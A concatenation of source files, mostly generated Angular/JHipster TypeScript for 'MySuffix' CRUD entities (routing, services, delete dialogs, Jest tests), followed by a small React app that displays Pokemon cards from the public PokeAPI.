canActivate: [UserRouteAccessService],
},
{
path: 'new',
component: EmployeeMySuffixUpdateComponent,
resolve: {
employee: EmployeeMySuffixRoutingResolveService,
},
canActivate: [UserRouteAccessService],
},
{
path: ':id/edit',
component: EmployeeMySuffixUpdateComponent,
resolve: {
employee: EmployeeMySuffixRoutingResolveService,
},
canActivate: [UserRouteAccessService],
},
];
@NgModule({
imports: [RouterModule.forChild(employeeRoute)],
exports: [RouterModule],
})
export class EmployeeMySuffixRoutingModule {}
<file_sep>import { Component } from '@angular/core';
import { NgbActiveModal } from '@ng-bootstrap/ng-bootstrap';
import { IDepartmentMySuffix } from '../department-my-suffix.model';
import { DepartmentMySuffixService } from '../service/department-my-suffix.service';
@Component({
templateUrl: './department-my-suffix-delete-dialog.component.html',
})
export class DepartmentMySuffixDeleteDialogComponent {
department?: IDepartmentMySuffix;
constructor(protected departmentService: DepartmentMySuffixService, public activeModal: NgbActiveModal) {}
cancel(): void {
this.activeModal.dismiss();
}
confirmDelete(id: string): void {
this.departmentService.delete(id).subscribe(() => {
this.activeModal.close('deleted');
});
}
}
<file_sep>import { NgModule } from '@angular/core';
import { RouterModule, Routes } from '@angular/router';
import { UserRouteAccessService } from 'app/core/auth/user-route-access.service';
import { JobHistoryMySuffixComponent } from '../list/job-history-my-suffix.component';
import { JobHistoryMySuffixDetailComponent } from '../detail/job-history-my-suffix-detail.component';
import { JobHistoryMySuffixUpdateComponent } from '../update/job-history-my-suffix-update.component';
import { JobHistoryMySuffixRoutingResolveService } from './job-history-my-suffix-routing-resolve.service';
const jobHistoryRoute: Routes = [
{
path: '',
component: JobHistoryMySuffixComponent,
canActivate: [UserRouteAccessService],
},
{
path: ':id/view',
component: JobHistoryMySuffixDetailComponent,
resolve: {
jobHistory: JobHistoryMySuffixRoutingResolveService,
},
canActivate: [UserRouteAccessService],
},
{
path: 'new',
component: JobHistoryMySuffixUpdateComponent,
resolve: {
jobHistory: JobHistoryMySuffixRoutingResolveService,
},
canActivate: [UserRouteAccessService],
},
{
path: ':id/edit',
component: JobHistoryMySuffixUpdateComponent,
resolve: {
jobHistory: JobHistoryMySuffixRoutingResolveService,
},
canActivate: [UserRouteAccessService],
},
];
@NgModule({
imports: [RouterModule.forChild(jobHistoryRoute)],
exports: [RouterModule],
})
export class JobHistoryMySuffixRoutingModule {}
<file_sep>import { Component } from '@angular/core';
import { NgbActiveModal } from '@ng-bootstrap/ng-bootstrap';
import { ICountryMySuffix } from '../country-my-suffix.model';
import { CountryMySuffixService } from '../service/country-my-suffix.service';
@Component({
templateUrl: './country-my-suffix-delete-dialog.component.html',
})
export class CountryMySuffixDeleteDialogComponent {
country?: ICountryMySuffix;
constructor(protected countryService: CountryMySuffixService, public activeModal: NgbActiveModal) {}
cancel(): void {
this.activeModal.dismiss();
}
confirmDelete(id: string): void {
this.countryService.delete(id).subscribe(() => {
this.activeModal.close('deleted');
});
}
}
<file_sep>jest.mock('@angular/router');
import { TestBed } from '@angular/core/testing';
import { HttpResponse } from '@angular/common/http';
import { HttpClientTestingModule } from '@angular/common/http/testing';
import { ActivatedRouteSnapshot, Router } from '@angular/router';
import { of } from 'rxjs';
import { ILocationMySuffix, LocationMySuffix } from '../location-my-suffix.model';
import { LocationMySuffixService } from '../service/location-my-suffix.service';
import { LocationMySuffixRoutingResolveService } from './location-my-suffix-routing-resolve.service';
describe('Service Tests', () => {
describe('LocationMySuffix routing resolve service', () => {
let mockRouter: Router;
let mockActivatedRouteSnapshot: ActivatedRouteSnapshot;
let routingResolveService: LocationMySuffixRoutingResolveService;
let service: LocationMySuffixService;
let resultLocationMySuffix: ILocationMySuffix | undefined;
beforeEach(() => {
TestBed.configureTestingModule({
imports: [HttpClientTestingModule],
providers: [Router, ActivatedRouteSnapshot],
});
mockRouter = TestBed.inject(Router);
mockActivatedRouteSnapshot = TestBed.inject(ActivatedRouteSnapshot);
routingResolveService = TestBed.inject(LocationMySuffixRoutingResolveService);
service = TestBed.inject(LocationMySuffixService);
resultLocationMySuffix = undefined;
});
describe('resolve', () => {
it('should return ILocationMySuffix returned by find', () => {
// GIVEN
service.find = jest.fn(id => of(new HttpResponse({ body: { id } })));
mockActivatedRouteSnapshot.params = { id: 'ABC' };
// WHEN
routingResolveService.resolve(mockActivatedRouteSnapshot).subscribe(result => {
resultLocationMySuffix = result;
});
// THEN
expect(service.find).toBeCalledWith('ABC');
expect(resultLocationMySuffix).toEqual({ id: 'ABC' });
});
it('should return new ILocationMySuffix if id is not provided', () => {
// GIVEN
service.find = jest.fn();
mockActivatedRouteSnapshot.params = {};
// WHEN
routingResolveService.resolve(mockActivatedRouteSnapshot).subscribe(result => {
resultLocationMySuffix = result;
});
// THEN
expect(service.find).not.toBeCalled();
expect(resultLocationMySuffix).toEqual(new LocationMySuffix());
});
it('should route to 404 page if data not found in server', () => {
// GIVEN
spyOn(service, 'find').and.returnValue(of(new HttpResponse({ body: null })));
mockActivatedRouteSnapshot.params = { id: 'ABC' };
// WHEN
routingResolveService.resolve(mockActivatedRouteSnapshot).subscribe(result => {
resultLocationMySuffix = result;
});
// THEN
expect(service.find).toBeCalledWith('ABC');
expect(resultLocationMySuffix).toEqual(undefined);
expect(mockRouter.navigate).toHaveBeenCalledWith(['404']);
});
});
});
});
<file_sep>import { NgModule } from '@angular/core';
import { SharedModule } from 'app/shared/shared.module';
import { TaskMySuffixComponent } from './list/task-my-suffix.component';
import { TaskMySuffixDetailComponent } from './detail/task-my-suffix-detail.component';
import { TaskMySuffixUpdateComponent } from './update/task-my-suffix-update.component';
import { TaskMySuffixDeleteDialogComponent } from './delete/task-my-suffix-delete-dialog.component';
import { TaskMySuffixRoutingModule } from './route/task-my-suffix-routing.module';
@NgModule({
imports: [SharedModule, TaskMySuffixRoutingModule],
declarations: [TaskMySuffixComponent, TaskMySuffixDetailComponent, TaskMySuffixUpdateComponent, TaskMySuffixDeleteDialogComponent],
entryComponents: [TaskMySuffixDeleteDialogComponent],
})
export class TaskMySuffixModule {}
<file_sep>import { TestBed } from '@angular/core/testing';
import { HttpClientTestingModule, HttpTestingController } from '@angular/common/http/testing';
import { IJobMySuffix, JobMySuffix } from '../job-my-suffix.model';
import { JobMySuffixService } from './job-my-suffix.service';
describe('Service Tests', () => {
describe('JobMySuffix Service', () => {
let service: JobMySuffixService;
let httpMock: HttpTestingController;
let elemDefault: IJobMySuffix;
let expectedResult: IJobMySuffix | IJobMySuffix[] | boolean | null;
beforeEach(() => {
TestBed.configureTestingModule({
imports: [HttpClientTestingModule],
});
expectedResult = null;
service = TestBed.inject(JobMySuffixService);
httpMock = TestBed.inject(HttpTestingController);
elemDefault = {
id: 'AAAAAAA',
jobTitle: 'AAAAAAA',
minSalary: 0,
maxSalary: 0,
};
});
describe('Service methods', () => {
it('should find an element', () => {
const returnedFromService = Object.assign({}, elemDefault);
service.find('ABC').subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'GET' });
req.flush(returnedFromService);
expect(expectedResult).toMatchObject(elemDefault);
});
it('should create a JobMySuffix', () => {
const returnedFromService = Object.assign(
{
id: 'ID',
},
elemDefault
);
const expected = Object.assign({}, returnedFromService);
service.create(new JobMySuffix()).subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'POST' });
req.flush(returnedFromService);
expect(expectedResult).toMatchObject(expected);
});
it('should update a JobMySuffix', () => {
const returnedFromService = Object.assign(
{
id: 'BBBBBB',
jobTitle: 'BBBBBB',
minSalary: 1,
maxSalary: 1,
},
elemDefault
);
const expected = Object.assign({}, returnedFromService);
service.update(expected).subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'PUT' });
req.flush(returnedFromService);
expect(expectedResult).toMatchObject(expected);
});
it('should partial update a JobMySuffix', () => {
const patchObject = Object.assign(
{
jobTitle: 'BBBBBB',
minSalary: 1,
},
new JobMySuffix()
);
const returnedFromService = Object.assign(patchObject, elemDefault);
const expected = Object.assign({}, returnedFromService);
service.partialUpdate(patchObject).subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'PATCH' });
req.flush(returnedFromService);
expect(expectedResult).toMatchObject(expected);
});
it('should return a list of JobMySuffix', () => {
const returnedFromService = Object.assign(
{
id: 'BBBBBB',
jobTitle: 'BBBBBB',
minSalary: 1,
maxSalary: 1,
},
elemDefault
);
const expected = Object.assign({}, returnedFromService);
service.query().subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'GET' });
req.flush([returnedFromService]);
httpMock.verify();
expect(expectedResult).toContainEqual(expected);
});
it('should delete a JobMySuffix', () => {
service.delete('ABC').subscribe(resp => (expectedResult = resp.ok));
const req = httpMock.expectOne({ method: 'DELETE' });
req.flush({ status: 200 });
expect(expectedResult);
});
describe('addJobMySuffixToCollectionIfMissing', () => {
it('should add a JobMySuffix to an empty array', () => {
const job: IJobMySuffix = { id: 'ABC' };
expectedResult = service.addJobMySuffixToCollectionIfMissing([], job);
expect(expectedResult).toHaveLength(1);
expect(expectedResult).toContain(job);
});
it('should not add a JobMySuffix to an array that contains it', () => {
const job: IJobMySuffix = { id: 'ABC' };
const jobCollection: IJobMySuffix[] = [
{
...job,
},
{ id: 'CBA' },
];
expectedResult = service.addJobMySuffixToCollectionIfMissing(jobCollection, job);
expect(expectedResult).toHaveLength(2);
});
it("should add a JobMySuffix to an array that doesn't contain it", () => {
const job: IJobMySuffix = { id: 'ABC' };
const jobCollection: IJobMySuffix[] = [{ id: 'CBA' }];
expectedResult = service.addJobMySuffixToCollectionIfMissing(jobCollection, job);
expect(expectedResult).toHaveLength(2);
expect(expectedResult).toContain(job);
});
it('should add only unique JobMySuffix to an array', () => {
const jobArray: IJobMySuffix[] = [{ id: 'ABC' }, { id: 'CBA' }, { id: 'Optimization calculating' }];
const jobCollection: IJobMySuffix[] = [{ id: 'ABC' }];
expectedResult = service.addJobMySuffixToCollectionIfMissing(jobCollection, ...jobArray);
expect(expectedResult).toHaveLength(3);
});
it('should accept varargs', () => {
const job: IJobMySuffix = { id: 'ABC' };
const job2: IJobMySuffix = { id: 'CBA' };
expectedResult = service.addJobMySuffixToCollectionIfMissing([], job, job2);
expect(expectedResult).toHaveLength(2);
expect(expectedResult).toContain(job);
expect(expectedResult).toContain(job2);
});
it('should accept null and undefined values', () => {
const job: IJobMySuffix = { id: 'ABC' };
expectedResult = service.addJobMySuffixToCollectionIfMissing([], null, job, undefined);
expect(expectedResult).toHaveLength(1);
expect(expectedResult).toContain(job);
});
});
});
afterEach(() => {
httpMock.verify();
});
});
});
<file_sep>import { Component } from '@angular/core';
import { NgbActiveModal } from '@ng-bootstrap/ng-bootstrap';
import { ILocationMySuffix } from '../location-my-suffix.model';
import { LocationMySuffixService } from '../service/location-my-suffix.service';
@Component({
templateUrl: './location-my-suffix-delete-dialog.component.html',
})
export class LocationMySuffixDeleteDialogComponent {
location?: ILocationMySuffix;
constructor(protected locationService: LocationMySuffixService, public activeModal: NgbActiveModal) {}
cancel(): void {
this.activeModal.dismiss();
}
confirmDelete(id: string): void {
this.locationService.delete(id).subscribe(() => {
this.activeModal.close('deleted');
});
}
}
<file_sep>import { NgModule } from '@angular/core';
import { SharedModule } from 'app/shared/shared.module';
import { DepartmentMySuffixComponent } from './list/department-my-suffix.component';
import { DepartmentMySuffixDetailComponent } from './detail/department-my-suffix-detail.component';
import { DepartmentMySuffixUpdateComponent } from './update/department-my-suffix-update.component';
import { DepartmentMySuffixDeleteDialogComponent } from './delete/department-my-suffix-delete-dialog.component';
import { DepartmentMySuffixRoutingModule } from './route/department-my-suffix-routing.module';
@NgModule({
imports: [SharedModule, DepartmentMySuffixRoutingModule],
declarations: [
DepartmentMySuffixComponent,
DepartmentMySuffixDetailComponent,
DepartmentMySuffixUpdateComponent,
DepartmentMySuffixDeleteDialogComponent,
],
entryComponents: [DepartmentMySuffixDeleteDialogComponent],
})
export class DepartmentMySuffixModule {}
<file_sep>import { Injectable } from '@angular/core';
import { HttpClient, HttpResponse } from '@angular/common/http';
import { Observable } from 'rxjs';
import { isPresent } from 'app/core/util/operators';
import { ApplicationConfigService } from 'app/core/config/application-config.service';
import { createRequestOption } from 'app/core/request/request-util';
import { IDepartmentMySuffix, getDepartmentMySuffixIdentifier } from '../department-my-suffix.model';
export type EntityResponseType = HttpResponse<IDepartmentMySuffix>;
export type EntityArrayResponseType = HttpResponse<IDepartmentMySuffix[]>;
@Injectable({ providedIn: 'root' })
export class DepartmentMySuffixService {
public resourceUrl = this.applicationConfigService.getEndpointFor('api/departments');
constructor(protected http: HttpClient, private applicationConfigService: ApplicationConfigService) {}
create(department: IDepartmentMySuffix): Observable<EntityResponseType> {
return this.http.post<IDepartmentMySuffix>(this.resourceUrl, department, { observe: 'response' });
}
update(department: IDepartmentMySuffix): Observable<EntityResponseType> {
return this.http.put<IDepartmentMySuffix>(`${this.resourceUrl}/${getDepartmentMySuffixIdentifier(department) as string}`, department, {
observe: 'response',
});
}
partialUpdate(department: IDepartmentMySuffix): Observable<EntityResponseType> {
return this.http.patch<IDepartmentMySuffix>(
`${this.resourceUrl}/${getDepartmentMySuffixIdentifier(department) as string}`,
department,
{ observe: 'response' }
);
}
find(id: string): Observable<EntityResponseType> {
return this.http.get<IDepartmentMySuffix>(`${this.resourceUrl}/${id}`, { observe: 'response' });
}
query(req?: any): Observable<EntityArrayResponseType> {
const options = createRequestOption(req);
return this.http.get<IDepartmentMySuffix[]>(this.resourceUrl, { params: options, observe: 'response' });
}
delete(id: string): Observable<HttpResponse<{}>> {
return this.http.delete(`${this.resourceUrl}/${id}`, { observe: 'response' });
}
addDepartmentMySuffixToCollectionIfMissing(
departmentCollection: IDepartmentMySuffix[],
...departmentsToCheck: (IDepartmentMySuffix | null | undefined)[]
): IDepartmentMySuffix[] {
const departments: IDepartmentMySuffix[] = departmentsToCheck.filter(isPresent);
if (departments.length > 0) {
const departmentCollectionIdentifiers = departmentCollection.map(departmentItem => getDepartmentMySuffixIdentifier(departmentItem)!);
const departmentsToAdd = departments.filter(departmentItem => {
const departmentIdentifier = getDepartmentMySuffixIdentifier(departmentItem);
if (departmentIdentifier == null || departmentCollectionIdentifiers.includes(departmentIdentifier)) {
return false;
}
departmentCollectionIdentifiers.push(departmentIdentifier);
return true;
});
return [...departmentsToAdd, ...departmentCollection];
}
return departmentCollection;
}
}
<file_sep>import * as dayjs from 'dayjs';
import { IJobMySuffix } from 'app/entities/job-my-suffix/job-my-suffix.model';
import { IDepartmentMySuffix } from 'app/entities/department-my-suffix/department-my-suffix.model';
import { IEmployeeMySuffix } from 'app/entities/employee-my-suffix/employee-my-suffix.model';
import { Language } from 'app/entities/enumerations/language.model';
export interface IJobHistoryMySuffix {
id?: string;
startDate?: dayjs.Dayjs | null;
endDate?: dayjs.Dayjs | null;
language?: Language | null;
job?: IJobMySuffix | null;
department?: IDepartmentMySuffix | null;
employee?: IEmployeeMySuffix | null;
}
export class JobHistoryMySuffix implements IJobHistoryMySuffix {
constructor(
public id?: string,
public startDate?: dayjs.Dayjs | null,
public endDate?: dayjs.Dayjs | null,
public language?: Language | null,
public job?: IJobMySuffix | null,
public department?: IDepartmentMySuffix | null,
public employee?: IEmployeeMySuffix | null
) {}
}
export function getJobHistoryMySuffixIdentifier(jobHistory: IJobHistoryMySuffix): string | undefined {
return jobHistory.id;
}
<file_sep>import { TestBed } from '@angular/core/testing';
import { HttpClientTestingModule, HttpTestingController } from '@angular/common/http/testing';
import { IRegionMySuffix, RegionMySuffix } from '../region-my-suffix.model';
import { RegionMySuffixService } from './region-my-suffix.service';
describe('Service Tests', () => {
describe('RegionMySuffix Service', () => {
let service: RegionMySuffixService;
let httpMock: HttpTestingController;
let elemDefault: IRegionMySuffix;
let expectedResult: IRegionMySuffix | IRegionMySuffix[] | boolean | null;
beforeEach(() => {
TestBed.configureTestingModule({
imports: [HttpClientTestingModule],
});
expectedResult = null;
service = TestBed.inject(RegionMySuffixService);
httpMock = TestBed.inject(HttpTestingController);
elemDefault = {
id: 'AAAAAAA',
regionName: 'AAAAAAA',
};
});
describe('Service methods', () => {
it('should find an element', () => {
const returnedFromService = Object.assign({}, elemDefault);
service.find('ABC').subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'GET' });
req.flush(returnedFromService);
expect(expectedResult).toMatchObject(elemDefault);
});
it('should create a RegionMySuffix', () => {
const returnedFromService = Object.assign(
{
id: 'ID',
},
elemDefault
);
const expected = Object.assign({}, returnedFromService);
service.create(new RegionMySuffix()).subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'POST' });
req.flush(returnedFromService);
expect(expectedResult).toMatchObject(expected);
});
it('should update a RegionMySuffix', () => {
const returnedFromService = Object.assign(
{
id: 'BBBBBB',
regionName: 'BBBBBB',
},
elemDefault
);
const expected = Object.assign({}, returnedFromService);
service.update(expected).subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'PUT' });
req.flush(returnedFromService);
expect(expectedResult).toMatchObject(expected);
});
it('should partial update a RegionMySuffix', () => {
const patchObject = Object.assign({}, new RegionMySuffix());
const returnedFromService = Object.assign(patchObject, elemDefault);
const expected = Object.assign({}, returnedFromService);
service.partialUpdate(patchObject).subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'PATCH' });
req.flush(returnedFromService);
expect(expectedResult).toMatchObject(expected);
});
it('should return a list of RegionMySuffix', () => {
const returnedFromService = Object.assign(
{
id: 'BBBBBB',
regionName: 'BBBBBB',
},
elemDefault
);
const expected = Object.assign({}, returnedFromService);
service.query().subscribe(resp => (expectedResult = resp.body));
const req = httpMock.expectOne({ method: 'GET' });
req.flush([returnedFromService]);
httpMock.verify();
expect(expectedResult).toContainEqual(expected);
});
it('should delete a RegionMySuffix', () => {
service.delete('ABC').subscribe(resp => (expectedResult = resp.ok));
const req = httpMock.expectOne({ method: 'DELETE' });
req.flush({ status: 200 });
expect(expectedResult);
});
describe('addRegionMySuffixToCollectionIfMissing', () => {
it('should add a RegionMySuffix to an empty array', () => {
const region: IRegionMySuffix = { id: 'ABC' };
expectedResult = service.addRegionMySuffixToCollectionIfMissing([], region);
expect(expectedResult).toHaveLength(1);
expect(expectedResult).toContain(region);
});
it('should not add a RegionMySuffix to an array that contains it', () => {
const region: IRegionMySuffix = { id: 'ABC' };
const regionCollection: IRegionMySuffix[] = [
{
...region,
},
{ id: 'CBA' },
];
expectedResult = service.addRegionMySuffixToCollectionIfMissing(regionCollection, region);
expect(expectedResult).toHaveLength(2);
});
it("should add a RegionMySuffix to an array that doesn't contain it", () => {
const region: IRegionMySuffix = { id: 'ABC' };
const regionCollection: IRegionMySuffix[] = [{ id: 'CBA' }];
expectedResult = service.addRegionMySuffixToCollectionIfMissing(regionCollection, region);
expect(expectedResult).toHaveLength(2);
expect(expectedResult).toContain(region);
});
it('should add only unique RegionMySuffix to an array', () => {
const regionArray: IRegionMySuffix[] = [{ id: 'ABC' }, { id: 'CBA' }, { id: 'driver paradigms Plastic' }];
const regionCollection: IRegionMySuffix[] = [{ id: 'ABC' }];
expectedResult = service.addRegionMySuffixToCollectionIfMissing(regionCollection, ...regionArray);
expect(expectedResult).toHaveLength(3);
});
it('should accept varargs', () => {
const region: IRegionMySuffix = { id: 'ABC' };
const region2: IRegionMySuffix = { id: 'CBA' };
expectedResult = service.addRegionMySuffixToCollectionIfMissing([], region, region2);
expect(expectedResult).toHaveLength(2);
expect(expectedResult).toContain(region);
expect(expectedResult).toContain(region2);
});
it('should accept null and undefined values', () => {
const region: IRegionMySuffix = { id: 'ABC' };
expectedResult = service.addRegionMySuffixToCollectionIfMissing([], null, region, undefined);
expect(expectedResult).toHaveLength(1);
expect(expectedResult).toContain(region);
});
});
});
afterEach(() => {
httpMock.verify();
});
});
});
<file_sep>import { Injectable } from '@angular/core';
import { HttpResponse } from '@angular/common/http';
import { Resolve, ActivatedRouteSnapshot, Router } from '@angular/router';
import { Observable, of, EMPTY } from 'rxjs';
import { mergeMap } from 'rxjs/operators';
import { ILocationMySuffix, LocationMySuffix } from '../location-my-suffix.model';
import { LocationMySuffixService } from '../service/location-my-suffix.service';
@Injectable({ providedIn: 'root' })
export class LocationMySuffixRoutingResolveService implements Resolve<ILocationMySuffix> {
constructor(protected service: LocationMySuffixService, protected router: Router) {}
resolve(route: ActivatedRouteSnapshot): Observable<ILocationMySuffix> | Observable<never> {
const id = route.params['id'];
if (id) {
return this.service.find(id).pipe(
mergeMap((location: HttpResponse<LocationMySuffix>) => {
if (location.body) {
return of(location.body);
} else {
this.router.navigate(['404']);
return EMPTY;
}
})
);
}
return of(new LocationMySuffix());
}
}
| c760b70e87cc7459f0932507494afa05df86bf7a | [
"TypeScript"
] | 57 | TypeScript | arshamsedaghatbin/jhipster-sample-applicationsiavash | 6b63f0cce53f87257f89977bb3d591275b685277 | 91fdf4989f99647f6904722089c19e252d19f3fd |
refs/heads/master | <repo_name>Ambitious156288/Pokemon-Cards-Collection<file_sep>/src/context/InputContext.js
import React, { createContext, useState } from 'react';
import PropTypes from 'prop-types';
const InputContext = createContext();
const InputProvider = ({ children }) => {
const [inputValue, setInputValue] = useState('');
const [quantity, setQuantity] = useState(10);
const [counter, setCounter] = useState(0);
const [toggle, setToggle] = useState(false);
const handleToggle = () => {
setToggle(!toggle);
};
const handleInput = e => {
setInputValue(e.target.value);
};
const handleQuantity = () => {
setQuantity(quantity + 10);
setCounter(counter + 1);
if (counter === 2) setQuantity(quantity + 120);
};
return (
<InputContext.Provider
value={{
inputValue,
handleInput,
quantity,
handleQuantity,
counter,
toggle,
handleToggle,
}}
>
{children}
</InputContext.Provider>
);
};
InputProvider.propTypes = {
children: PropTypes.element.isRequired,
};
export { InputProvider, InputContext };
<file_sep>/src/views/Root/Root.js
import React from 'react';
import 'bootstrap/dist/css/bootstrap.min.css';
import { ThemeProvider } from 'styled-components';
import { theme } from 'theme/theme';
import Backgroud from 'theme/Background';
import Header from 'components/Header/Header';
import { InputProvider } from 'context/InputContext';
import Show from 'components/PokemonCatalog/Show';
const Root = () => {
return (
<ThemeProvider theme={theme}>
<InputProvider>
<Backgroud />
<Header />
<Show />
</InputProvider>
</ThemeProvider>
);
};
export default Root;
<file_sep>/src/components/Header/Input.js
import React, { useContext } from 'react';
import { withStyles } from '@material-ui/core/styles';
import TextField from '@material-ui/core/TextField';
import { InputContext } from 'context/InputContext';
const CssTextField = withStyles({
root: {
'& label.Mui-focused': {
color: 'green',
},
'& .MuiInput-underline:after': {
borderBottomColor: 'green',
},
},
})(TextField);
const Input = () => {
const { inputValue, handleInput, toggle } = useContext(InputContext);
return (
<>
{toggle && (
<form noValidate>
<CssTextField
id="custom-css-standard-input"
label="search by name"
value={inputValue}
onChange={handleInput}
/>
</form>
)}
</>
);
};
export default Input;
<file_sep>/src/theme/Background.js
import { createGlobalStyle } from 'styled-components';
import backgroundImage from 'assets/backgroundImage.png';
const Background = createGlobalStyle`
@import url('https://fonts.googleapis.com/css2?family=Roboto&display=swap');
body{
font-family: 'Roboto', sans-serif;
background: linear-gradient(rgba(255,255,255,.1), rgba(255,255,255,.1)), url(${backgroundImage}) center;
background-attachment: fixed;
}
`;
export default Background;
<file_sep>/src/components/PokemonCatalog/Show.js
import React, { useContext } from 'react';
import styled from 'styled-components';
import Button from '@material-ui/core/Button';
import PokemonsList from 'components/PokemonCatalog/PokemonsList';
import { InputContext } from 'context/InputContext';
const StyledButton = styled.div`
position: absolute;
top: 16%;
left: 50%;
transform: translate(-50%, 0);
`;
const Show = () => {
const { toggle, handleToggle } = useContext(InputContext);
return (
<>
<StyledButton>
<Button variant="contained" color="primary" onClick={handleToggle}>
{toggle ? 'Hide' : 'Show'} Cards
</Button>
</StyledButton>
{toggle && <PokemonsList />}
</>
);
};
export default Show;
<file_sep>/src/components/PokemonCatalog/PokemonsList.js
import React, { useState, useEffect, useContext } from 'react';
import axios from 'axios';
import styled from 'styled-components';
import BootstrapSwitchButton from 'bootstrap-switch-button-react';
import { InputContext } from 'context/InputContext';
import { Button } from 'react-bootstrap';
import PokemonCard from './PokemonCard';
const StyledMargin = styled.div`
margin-top: 100px;
text-align: center;
`;
const StyledGallery = styled.div`
display: grid;
grid-template-columns: repeat(auto-fill, minmax(280px, 1fr));
gap: 30px;
margin: 0 20px;
margin-top: 70px;
margin-bottom: 70px;
justify-items: center;
`;
const StyledCenter = styled.div`
text-align: center;
margin: 100px;
`;
const getPokemons = () => {
const { quantity, handleQuantity, counter, inputValue } = useContext(InputContext);
const API_URL = 'https://pokeapi.co/api';
const VERSION = 'v2';
const RESOURCE = 'pokemon?limit=';
const API_ENDPOINT = `${API_URL}/${VERSION}/${RESOURCE}${quantity}`;
const [pokemons, setPokemons] = useState([]);
const [flag, setFlag] = useState(false);
const [color, setColor] = useState('dark');
useEffect(() => {
axios.get(API_ENDPOINT).then(res => {
setPokemons(res.data.results);
});
}, [pokemons]);
return (
<>
<StyledMargin>
<BootstrapSwitchButton
onstyle="dark"
width={160}
onlabel=" Dark Cards"
offlabel=" Light Cards"
onChange={() => {
setColor(flag ? 'dark' : 'light');
setFlag(!flag);
}}
/>
</StyledMargin>
<StyledGallery>
{pokemons.map(
item =>
item.name.includes(inputValue) && (
<PokemonCard key={item.id} name={item.name} url={item.url} theme={color} />
),
)}
</StyledGallery>
<StyledCenter>
{counter === 3 ? null : (
<Button size="lg" variant="warning" onClick={handleQuantity}>
{counter === 2 ? 'show all' : 'load more'}
</Button>
)}
</StyledCenter>
</>
);
};
export default getPokemons;
<file_sep>/src/components/Header/Triangle.js
import React from 'react';
import styled from 'styled-components';
const StyledTriangle = styled.div`
position: absolute;
top: 0;
left: 50%;
transform: translate(-50%, 0);
width: 0;
height: 0;
border-left: 400px solid transparent;
border-right: 400px solid transparent;
border-top: 180px solid ${({ theme }) => theme.green};
`;
const Triangle = () => <StyledTriangle />;
export default Triangle;
| ff1e8e2eb146f17b8b51f958b8a7f52bb17ffb98 | [
"JavaScript"
] | 7 | JavaScript | Ambitious156288/Pokemon-Cards-Collection | e1d641467a73ce7a58f9a780a41748b980b8f5ca | e7c87b5d4a4cab406055c5b222e107f32526a481 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.